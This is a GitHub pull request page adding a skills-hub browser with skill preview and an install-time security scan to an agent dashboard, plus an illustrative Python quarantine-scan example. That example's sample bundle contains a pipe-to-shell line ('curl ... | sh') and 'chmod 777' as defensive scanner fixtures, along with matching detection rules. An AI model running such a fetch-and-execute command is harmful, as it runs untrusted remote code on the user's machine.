feat(dashboard): rehaul Skills hub browser — connected hubs, featured, preview + security scan #40384
Merged
…, preview + security scan

The Browse-hub tab was a blank search box with sparse result cards (name + source + one Install button), no way to read a skill before installing, no visual security scan, and no indication it was even connected to any hubs.

Backend (web_server.py):
- GET /api/skills/hub/sources — lists the configured hubs (label + trust tier + GitHub rate-limit + index availability) and featured skills pulled from the centralized index (zero extra API calls), plus installed-skill provenance so the UI can mark already-installed results.
- GET /api/skills/hub/preview — fetches a skill's SKILL.md text + file manifest WITHOUT installing (decodes byte-stored text, masks binaries).
- GET /api/skills/hub/scan — runs the SAME quarantine + scan_skill + should_allow_install pipeline the CLI installer uses, then cleans up quarantine, returning verdict / per-finding detail / severity tally / install-policy decision.
- search now returns per-source counts + timed-out sources + installed map.

Frontend (SkillsPage HubBrowser):
- Landing state: connected-hubs strip + featured skill grid (no more blank page).
- Rich cards: trust-level color coding, source, tags, identifier, Details + Install (or Installed state).
- Detail dialog: read the actual SKILL.md, on-demand visual security scan (verdict pill, severity tally, per-finding list, allow/block policy), GitHub repo link.
- Search meta line: result count + timing + per-source breakdown (the 'feels slow / no feedback' complaint).

Tests: 4 new endpoint test classes (sources/preview/scan + updated search shape) in test_dashboard_admin_endpoints.py.
🔎 Lint report:

| Rule | Count |
|---|---|
| invalid-assignment | 3 |

First entries
hermes_cli/web_server.py:6803: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["rate_limited"]` and value of type `Literal[False]` on object of type `dict[str, str]`
hermes_cli/web_server.py:6809: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["available"]` and value of type `bool` on object of type `dict[str, str]`
hermes_cli/web_server.py:6801: [invalid-assignment] invalid-assignment: Invalid subscript assignment with key of type `Literal["rate_limited"]` and value of type `bool` on object of type `dict[str, str]`
✅ Fixed issues: none
Unchanged: 5162 pre-existing issues carried over.
Diagnostics are surfaced as warnings — this check never fails the build.
changman pushed a commit to changman/hermes-agent that referenced this pull request Jun 10, 2026
…, preview + security scan (NousResearch#40384)
Summary
The dashboard's Browse hub tab (Skills page) goes from a blank search box with sparse one-button result cards to a full skill browser: it shows which hubs are connected, surfaces featured skills on arrival, lets you read the actual SKILL.md before installing, and runs the same security scan we do at install time — visually, on demand.
What was wrong
Changes
Backend — `hermes_cli/web_server.py`
- `GET /api/skills/hub/sources` — configured hubs (label, trust tier, GitHub rate-limit, index availability) + featured skills from the centralized index (zero extra API calls) + installed-skill provenance.
- `GET /api/skills/hub/preview` — a skill's SKILL.md text + file manifest, without installing (decodes byte-stored text, masks binaries).
- `GET /api/skills/hub/scan` — runs the exact `quarantine_bundle` → `scan_skill` → `should_allow_install` pipeline the CLI installer uses, cleans up quarantine, returns verdict / per-finding detail / severity tally / install-policy decision.
- `search` now returns per-source counts + timed-out sources + installed map (drives feedback + "installed" badges).

Frontend — `web/src/pages/SkillsPage.tsx` (HubBrowser)
`web/src/lib/api.ts` — types + client methods for the new endpoints.

Validation
`20 results · 0.4s · hermes-index:50 official:1` `aria-describedby` wired. `tests/hermes_cli/test_dashboard_admin_endpoints.py` 53 passed. `npx vite build` clean; rebased onto current `main`.

Infographic
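
The scan-without-installing flow named in the description (quarantine, scan, policy decision, cleanup), as an added Python example that is not code from this pull request or from the project. `scan_preview`, the toy rules, the verdict names and the trust policy are assumptions; the real `quarantine_bundle`, `scan_skill` and `should_allow_install` signatures are not shown on this page.

```python
import shutil
import tempfile
from collections import Counter
from pathlib import Path

# Constructed toy rules (substring, severity, message); the real scanner's rules are not on this page.
RULES = [
    ("curl http", "high", "script fetches remote content"),
    ("chmod 777", "medium", "world-writable permissions"),
]
RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}

SAMPLE = {  # constructed bundle, not a real skill
    "SKILL.md": "# demo skill\nRuns a setup script.\n",
    "scripts/setup.sh": "chmod 777 /tmp/x\ncurl http://example.invalid/i.sh | sh\n",
}


def scan_preview(files: dict[str, str], trust: str) -> dict:
    """Scan a bundle inside a throwaway quarantine directory; never installs it."""
    quarantine = Path(tempfile.mkdtemp(prefix="skill-quarantine-")).resolve()
    try:
        for rel, text in files.items():
            dest = (quarantine / rel).resolve()
            # Bundle paths are untrusted input: refuse anything that escapes quarantine.
            if not dest.is_relative_to(quarantine):
                raise ValueError(f"path escapes quarantine: {rel!r}")
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_text(text, encoding="utf-8")
        findings = []
        for path in sorted(p for p in quarantine.rglob("*") if p.is_file()):
            for lineno, line in enumerate(path.read_text(encoding="utf-8").splitlines(), 1):
                for needle, severity, message in RULES:
                    if needle in line:
                        findings.append({"file": path.relative_to(quarantine).as_posix(),
                                         "line": lineno, "severity": severity, "message": message})
        worst = max((RANK[f["severity"]] for f in findings), default=-1)
        verdict = "safe" if worst < 0 else "caution" if worst < RANK["high"] else "dangerous"
        # Assumed policy: "dangerous" always blocks; "caution" installs only from a trusted hub.
        allowed = verdict == "safe" or (verdict == "caution" and trust == "trusted")
        return {"verdict": verdict, "findings": findings,
                "severity_counts": dict(Counter(f["severity"] for f in findings)),
                "policy": {"allowed": allowed, "trust": trust},
                "quarantine": str(quarantine)}  # returned only so cleanup can be verified
    finally:
        # Runs on success, scanner error and rejected path alike: nothing stays on disk.
        shutil.rmtree(quarantine, ignore_errors=True)
```

Because the cleanup sits in `finally`, a scanner exception or a rejected bundle path cannot leave unscanned third-party files behind in the quarantine directory.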